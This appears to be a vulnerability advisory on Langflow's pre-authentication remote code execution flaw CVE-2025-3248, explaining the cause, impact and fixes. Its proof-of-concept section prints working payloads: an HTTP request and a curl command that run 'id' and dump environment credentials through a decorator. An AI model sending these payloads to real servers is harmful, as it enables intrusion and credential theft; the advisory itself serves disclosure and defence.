Vulnerable Version
versions prior to 1.3.0
Fixed Version
upgrade to the latest version
Base Score
9.8 Critical
Vendor Description:-
Langflow is a visual, low-code platform for developing AI applications, notably those that use multi-agent networks and Retrieval-Augmented Generation (RAG). It provides a drag-and-drop interface that allows developers to link various AI components such as prompts, language models, and data sources without requiring considerable coding. Langflow is open source, Python-based, and LLM/vector store agnostic, allowing developers to quickly construct and test artificial intelligence applications.
Langflow API Pre Auth RCE CVE-2025-3248 Vulnerability Description: –
Langflow’s /api/v1/validate/code endpoint has a flaw in its handling of user-submitted code. Prior to version 1.3.0, the application validated function definitions using Python’s compile and exec() functions, which parsed them into an Abstract Syntax Tree (AST) and processed specified components.
Steps include:
- Parsing the code field with ast.parse().
- Importing the given modules.
- Executing function definitions (ast.FunctionDef) to verify their structure.
The problem stems from Python’s behavior during function definition, in which decorators and default parameter values are evaluated instantly. Malicious code embedded in these places executes during AST processing, allowing attackers to perform unauthenticated RCE by sending payloads to the endpoint. The lack of authentication or sandboxing allows for unrestricted exploitation.
Impact:-
- Remote Code Execution: CVE-2025-3248 enables attackers to run arbitrary code remotely, resulting in complete system penetration.
- Unauthorized Access: By exploiting the vulnerability, attackers can overcome security measures and obtain access to sensitive data.
- Privilege Escalation: Attackers can increase their privileges within the compromised system, enhancing the possibility of further infiltration.
- Data Theft and Integrity Risks: Unauthorized access could result in data breaches, file manipulation, or the theft of important business information.
- Operational disruptions: Successful exploitation may cause service outages, system instability, and potential business interruptions.
MItigations:-
- Upgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the
/api/v1/validate/codeendpoint requires authentication - Implement input sandboxing: If custom validation is needed, avoid using the
exec()function with untrusted code or employ sandboxing mechanisms. - Monitoring and alerting: Use detection to identify unusual requests to validation endpoints and unexpected outgoing connections.
POC
To test the vulnerability, submit a POST request to the /api/v1/validate/code endpoint containing a malicious Python function definition. For example, the following payload will execute the id command on the server via a decorator:
POST /api/v1/validate/code HTTP/1.1
Host: 192.168.146.137:7860
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 109
{"code": "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef foo():\n pass"}
Remote code execution is now simple – simply insert the payload into a decorator. Here’s an example of launching a Python reverse shell against a vulnerable host at 192.168.x.x.
The decorator can raise an exception, allowing for interactive RCE. For example, the following will run the env command and return the login and password of the Langflow superuser, assuming Langflow is configured with authentication enabled:
curl -X POST -H 'Content-Type: application/json' http://192.168.146.137:7860/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")\ndef foo():\n pass"}'
Refrences:-
https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248